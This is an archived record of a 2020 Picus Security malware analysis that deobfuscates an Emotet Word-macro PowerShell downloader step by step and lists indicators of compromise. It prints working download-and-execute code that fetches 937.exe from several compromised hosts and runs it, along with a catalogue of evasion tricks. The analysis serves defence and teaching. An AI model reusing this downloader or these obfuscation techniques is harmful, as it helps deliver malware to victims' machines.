{
	"id": "488cecfd-cbb3-4924-aa9a-445ce81174c5",
	"created_at": "2026-04-06T00:06:48.115652Z",
	"updated_at": "2026-04-10T13:12:20.251399Z",
	"deleted_at": null,
	"sha1_hash": "6d0c61cc0ec60122852e85ab9599886f4be13444",
	"title": "An Analysis of Emotet Malware: PowerShell Unobfuscation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 414639,
	"plain_text": "An Analysis of Emotet Malware: PowerShell Unobfuscation\r\nBy Picus Security Inc.\r\nPublished: 2020-07-14 · Archived: 2026-04-05 20:44:00 UTC\r\n7 min read\r\nJul 14, 2020\r\nby Süleyman Özarslan, PhD\r\nResearchers identified Emotet for the first time in 2014 as banking malware stealing sensitive and private\r\ninformation. Now, adversaries are using Emotet as Infrastructure as a Service (IaaS) for delivering malware,\r\nincluding other banking Trojans. Emotet incorporates various obfuscation and evasion techniques to avoid\r\ndetection, and these techniques change over time.\r\nWe revealed obfuscated Visual Basic code in the first part of the Emotet Technical Analysis series. In this second\r\npart, we analyze the PowerShell code in the Emotet malware document (PowerShell, MITRE ATT\u0026CK T1086).\r\nWe analyzed the following Word document step by step in the first part:\r\nMD5: 515f13034bc4ccf635b026722fd5ef9c\r\nSHA-1: 8925b822e1d86d787b4682d1bb803cf1f5ea7031\r\nhttps://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b\r\nPage 1 of 9\n\nSHA-256:\r\nVirusTotal detection rate: 13/61 as of January 21, 2020\r\nNames: ST_28546448.doc, 01856218536426646.doc\r\n1) VBA code analysis\r\nLet’s remember the revealed VBA code (Scripting, MITRE ATT\u0026CK T1064):\r\n1.\r\nDo While GetObject(winmgmtS:win32_Process).Create(\"Powershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAY\r\nLoop\r\nIn this Do While loop, the Create method of the Win32_Process class is used to create a new process.\r\n💡 The Create WMI class method creates a new process.\r\nSyntax:\r\nuint32 Create(\r\n [in] string CommandLine,\r\n [in] string CurrentDirectory,\r\n [in] Win32_ProcessStartup ProcessStartupInformation,\r\n [out] uint32 ProcessId\r\n);\r\nThe first parameter is the CommandLine to execute. 
It is a PowerShell command in this code\r\n(PowerShell, MITRE ATT\u0026CK T1086).\r\nThe second parameter is the CurrentDirectory. If this parameter is NULL, the new process will have the\r\nsame path as the calling process.\r\nThe third parameter is ProcessStartupInformation, like winmgmtS:win32_ProcessStartuP in this\r\nexample.\r\n💡 The Win32_ProcessStartup abstract WMI class represents the startup configuration of a Windows-based\r\nprocess. The class is defined as a method type definition, which means that it is only used for passing information\r\nto the Create method of the Win32_Process class.\r\nThe last parameter is the global process identifier that can be used to identify a process.\r\nTherefore, the VBA code embedded in the Word document executes a PowerShell command using WMI\r\n(Windows Management Instrumentation, MITRE ATT\u0026CK T1047).\r\n💡 Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on\r\nWindows-based operating systems.\r\n2) Analyzing the PowerShell parameters\r\nWe’ll reveal the obfuscated malicious PowerShell command in this blog. Let's remember the PowerShell\r\ncommand:\r\n2.\r\nPowershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7\r\nLet’s start with the -w parameter and the hidden value: -w hidden. However, there is no parameter\r\nnamed -w according to the official PowerShell documentation. In fact, the -w parameter is completed\r\nby PowerShell as the -WindowStyle parameter because of the parameter substring completion feature of\r\nPowerShell.\r\n💡 PowerShell Parameter Completion: Substrings of parameters like -NoEx (-NoExit), -Executi (-ExecutionPolicy),\r\n-w (-WindowStyle) are used in the PowerShell command instead of the complete\r\nparameter string to avoid detection. 
Because of the way that PowerShell handles parameters, parameter substrings\r\nlike -W, -Wi, -WindowSt, -WindowSty are all valid ways of specifying an execution argument such as\r\n-WindowStyle.\r\n💡 -w can be used for -WindowStyle, because -WindowStyle is the only parameter that starts with -w.\r\nAdversaries commonly use the -WindowStyle parameter with the Hidden value in malicious PowerShell\r\ncommands to avoid detection (Hidden Window, MITRE ATT\u0026CK T1143). Actually, -WindowStyle Hidden does\r\nnot entirely hide the PowerShell command window; it shows the command window for a while before hiding it.\r\n💡 The -WindowStyle parameter sets the window style for the session. Valid values are Normal, Minimized,\r\nMaximized, and Hidden.\r\nThe second parameter is -en. Similar to -w, there is no parameter named -en according to the\r\nofficial PowerShell documentation. The -en parameter is completed as the -EncodedCommand parameter by\r\nPowerShell.\r\n💡 The -e parameter cannot be used for -EncodedCommand, because multiple parameters start with -e:\r\n-EncodedCommand and -ExecutionPolicy.\r\n💡 -EncodedCommand accepts a base-64-encoded string version of a command.\r\nTherefore, we must use base64 decoding to reveal the PowerShell command (Obfuscated Files or\r\nInformation, MITRE ATT\u0026CK T1027). 
After base64 decoding:\r\n3.\r\n$Azytjhzgaumig='Nvxdxgccbng';$Nnyjthcrzjoyv = '937';$Iiqsfpsm='Rogxpgyve';$Ekxhlobqrlh=$env:userprofi\r\n3) Deobfuscation of the PowerShell code\r\nLet’s beautify the code:\r\n4.\r\n$Azytjhzgaumig='Nvxdxgccbng';\r\n$Nnyjthcrzjoyv = '937';\r\n$Iiqsfpsm='Rogxpgyve';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Sbrypywxgcitf='Wpawybiqmj';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\n$Nuoltwfqh='Qrvohdiubfek';\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"Dow`Nloadfi`LE\"($Ndlualuv, $Ekxhlobqrlh);\r\n$Hkukkfoptjdr='Xabdxvkfcma';\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"L`eng`TH\" -ge 29936) {[Diagnostics.Process]::\"s`TARt\"($Ekxhlobq\r\n$Yzjjfplmkgx='Bxlkqmtxa';\r\nbreak;\r\n$Molchijx='Quatlbdlqvfdp'}}\r\ncatch{}}\r\n$Rckajrxvi='Ejecwargkcl'\r\nThere are garbage variable assignments that only serve to obfuscate the code. Let’s remove them:\r\n5.\r\n$Nnyjthcrzjoyv = '937';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"Dow`Nloadfi`LE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"L`eng`TH\" -ge 29936) {[Diagnostics.Process]::\"s`TARt\"($Ekxhlobq\r\nbreak;}}\r\ncatch{}}\r\nThere are ` (backtick) characters, which are used to obfuscate the code. 
In this case, the backticks do not escape any\r\ncharacter, so we can remove them from the code.\r\n💡 The ` (backtick, grave accent) character is PowerShell's escape character.\r\n6.\r\n$Nnyjthcrzjoyv = '937';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh\r\nbreak;}}\r\ncatch{}}\r\nLet’s put '937' in place of $Nnyjthcrzjoyv.\r\n7.\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+'937'+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh\r\nbreak;}}\r\ncatch{}}\r\nNow, let’s get rid of the + characters.\r\n💡 The + operator in PowerShell concatenates two string expressions and adds integers.\r\n8.\r\n$Ekxhlobqrlh=$env:userprofile\\937.exe;\r\n$Hirmyhqaltos=\u0026('new-object') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-Item') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh); b\r\ncatch{}}\r\nLet’s put '$env:userprofile\\937.exe' in place of $Ekxhlobqrlh, and '\u0026('new-object') NeT.WeBCLiEnT' in\r\nplace of $Hirmyhqaltos
:\r\n9.\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakist\r\nforeach($Ndlualuv in $Rxbywici){try{\u0026('new-object') NeT.WeBCLiEnT.DowNloadfiLE($Ndlualuv, $env:userp\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env\r\nbreak;}}\r\ncatch{}}\r\nLet’s replace the variable names with more readable ones:\r\n10.\r\n$list='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.c\r\nforeach($url in $list){try{\u0026('new-object') NeT.WeBCLiEnT.DowNloadfiLE($url, $env:userprofile\\937.exe\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env\r\nbreak;}}\r\ncatch{}}\r\nNow, we must reveal the $list variable. The Split() method is applied to this variable.\r\n💡 Split(Char[]) splits a string into substrings that are based on the characters in the separator array.\r\nIn this case, the separator is [char]42, which is equal to the * (asterisk) character. 
Therefore,\r\n11.\r\n$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakis\r\nforeach($url in $list){try{\u0026('new-object') NeT.WeBCLiEnT.\"DowNloadfiLE\"($url, $env:userprofile\\937.ex\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env\r\ncatch{}}\r\nLet’s change the random case to PascalCase:\r\n💡 Randomized case: In this old method, uppercase and lowercase letters appear in a random sequence in the\r\ncode, which is useful to bypass weak security controls.\r\n4) Analyzing the deobfuscated PowerShell code\r\n12.\r\n$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakis\r\nforeach($url in $list){try{\u0026('new-object') Net.WebClient.\"DownloadFile\"($url, $env:userprofile\\937.exe\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"Length\" -ge 29936) {[Diagnostics.Process]::\"Start\"($env\r\nbreak;}}\r\ncatch{}}\r\nThe first line defines the $list array that includes the following URLs:\r\nhxxp://ahc.mrbdev.com/wp-admin/qp0/\r\nhxxp://e-twow.be/verde/in6k/\r\nhxxps://magnificentpakistan.com/wp-includes/ha5j0b1/\r\nhxxps://www.qwqoo.com/homldw/3piyy4/\r\nhxxp://siwakuposo.com/siwaku2/X5zB0ey/\r\nThe second line, a foreach loop, tries to download a file from the URLs included in the $list array in\r\nthe given order via the Net.WebClient.DownloadFile method and saves the downloaded file to the\r\n$env:userprofile directory as 937.exe.\r\n💡 Net.WebClient.DownloadFile(Uri address, string fileName): The WebClient.DownloadFile method of the\r\nSystem.Net namespace downloads the resource with the specified URI to a local file.\r\n💡 $env:userprofile indicates the userprofile environment variable that specifies the user's profile\r\ndirectory. 
This directory stores the personal data of the user, and a typical path is C:\\Users\\Username.\r\nThe third line, an If condition, returns true if the length of the downloaded file 937.exe is greater\r\nthan or equal to 29936 bytes, using the -ge 29936 comparison operator (ge: greater than or equal).\r\nIf it returns true, the Diagnostics.Process.Start method executes 937.exe, then the loop exits. The\r\nexact file size of 937.exe is 905472 bytes. What could be the reason for comparing the file size? The\r\nanswer is simple: adversaries are trying to figure out whether the file was actually downloaded.\r\n💡 Diagnostics.Process.Start(string fileName): The Process.Start method of the System.Diagnostics\r\nnamespace starts a process resource by specifying the name of a document or application file and associates the\r\nresource with a new Process component.\r\nAdversaries used the Invoke-Item cmdlet to execute the downloaded file in our previous Emotet analysis. Now,\r\nthey are using the Process.Start method instead of Invoke-Item to decrease the detection rate.\r\nIn our analysis, the PowerShell code downloaded 937.exe from the first URL. The other URLs are also active.\r\nMD5: 032a5220e159fcf2f33cc9799f11ade6\r\nSHA-1: 9768eb95d1ac398425fc5eced31b5f83025c6faf\r\nSHA-256: cb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f\r\nVirusTotal detection rate: 6/73 as of January 21, 2020, 49/73 as of February 6, 2020\r\nNames: 937.exe, 565.exe\r\nSummary\r\nThe purpose of this second part of the Emotet Technical Analysis Series is to analyze the PowerShell code\r\nincluded in the heavily obfuscated Visual Basic macros revealed in the first article. Briefly, this PowerShell code\r\ndownloads a file from a list of URLs, then executes the file as a process.\r\nAdversaries used the following techniques in the PowerShell code for obfuscation and evasion:\r\n1. 
WMI was used to create a process instead of cmd. If WMI activity is not monitored, it is hard to detect\r\nthe creation of the malicious process.\r\n2. Substrings of parameters were used instead of the complete version of the parameters. PowerShell\r\ncompletes the incomplete version of a parameter. -w was used for -WindowStyle and -en was used for\r\n-EncodedCommand.\r\n3. The -WindowStyle parameter was used with the Hidden value to hide the PowerShell command\r\nwindow.\r\n4. The Base64-encoded version of the PowerShell command was used with the -EncodedCommand parameter.\r\n5. Garbage variable assignments were used to obfuscate the code.\r\n6. The ` (backtick) character was used to obfuscate strings. For example, Dow`Nloadfi`LE was used\r\ninstead of DowNloadfiLE.\r\n7. The + operator was used to concatenate fragmented strings. As an example, 'new-o'+'bj'+'ect' was used\r\ninstead of new-object to evade weak security controls.\r\n8. URLs were joined with the * (asterisk) character to evade weak URL regexes of security controls. Then,\r\nthe Split() method was used to separate the URLs.\r\n9. The [char] conversion function was used for obfuscation. For example, [char]42 was used for the *\r\n(asterisk) character.\r\n10. Randomized case (e.g., NeT.WeBCLiEnT) was used to bypass weak security controls.\r\n11. 
The Process.Start method was used to execute the downloaded file instead of a more common\r\nexecution method such as the Invoke-Item cmdlet.\r\nWhat is next?\r\nWe will analyze the behavior of the executed file 937.exe in the third part of the Emotet Technical Analysis\r\nseries.\r\nMITRE’s ATT\u0026CK Techniques Observed\r\nExecution: T1086 PowerShell, T1064 Scripting, T1047 Windows Management Instrumentation\r\nDefense Evasion: T1027 Obfuscated Files or Information, T1143 Hidden Windows, T1064 Scripting\r\nIndicators of Compromise (IoCs)\r\nExecutable\r\ncb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f\r\nDomains\r\n5kmtechnologies.com\r\ne-twow.be\r\nqwqoo.com\r\nmagnificentpakistan.com\r\nsiwakuposo.com\r\nyesimsatirli.com\r\nURLs\r\nhxxp://ahc.mrbdev.com/wp-admin/qp0/\r\nhxxp://e-twow.be/verde/in6k/\r\nhxxps://humana.5kmtechnologies.com/wp-includes/KdR9xbBq1/\r\nhxxps://magnificentpakistan.com/wp-includes/ha5j0b1/\r\nhxxps://www.qwqoo.com/homldw/3piyy4/\r\nhxxp://siwakuposo.com/siwaku2/X5zB0ey/\r\nhxxp://yesimsatirli.com/baby/HsWjaCfoR/\r\nIPs\r\n83.150.215.163\r\n111.90.144.211\r\nSource: https://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/picus-security/an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b"
	],
	"report_names": [
		"an-analysis-of-emotet-malware-powershell-unobfuscation-4f46b50dcf2b"
	],
	"threat_actors": [],
	"ts_created_at": 1775434008,
	"ts_updated_at": 1775826740,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6d0c61cc0ec60122852e85ab9599886f4be13444.pdf",
		"text": "https://archive.orkl.eu/6d0c61cc0ec60122852e85ab9599886f4be13444.txt",
		"img": "https://archive.orkl.eu/6d0c61cc0ec60122852e85ab9599886f4be13444.jpg"
	}
}